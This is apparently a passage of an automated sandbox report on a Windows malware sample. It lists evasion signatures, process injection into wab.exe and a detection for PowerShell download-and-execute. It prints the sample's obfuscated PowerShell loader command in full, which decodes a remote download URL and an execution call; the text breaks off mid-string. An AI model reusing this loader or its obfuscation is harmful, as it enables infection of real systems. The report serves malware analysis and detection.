Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 6680245

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5060	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4741	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7848	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1924	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 6064	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1652	Thread sleep count: 7848 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1660	Thread sleep count: 1924 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wscript.exe, 00000000.00000002.1257342112.000002A082D03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236556410.000002A084C91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235793781.000002A084C91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236306406.000002A082CE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1257574437.000002A084C91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255686950.000002A082D03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255783384.000002A084C91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236134383.000002A082CBA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1822594494.000001BCE0A50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1256877918.000002A084CCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\S
Source: powershell.exe, 00000002.00000002.1823218141.000001BCE0A8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_5504.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3452, type: MEMORYSTR

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3CB0000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A3F888			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

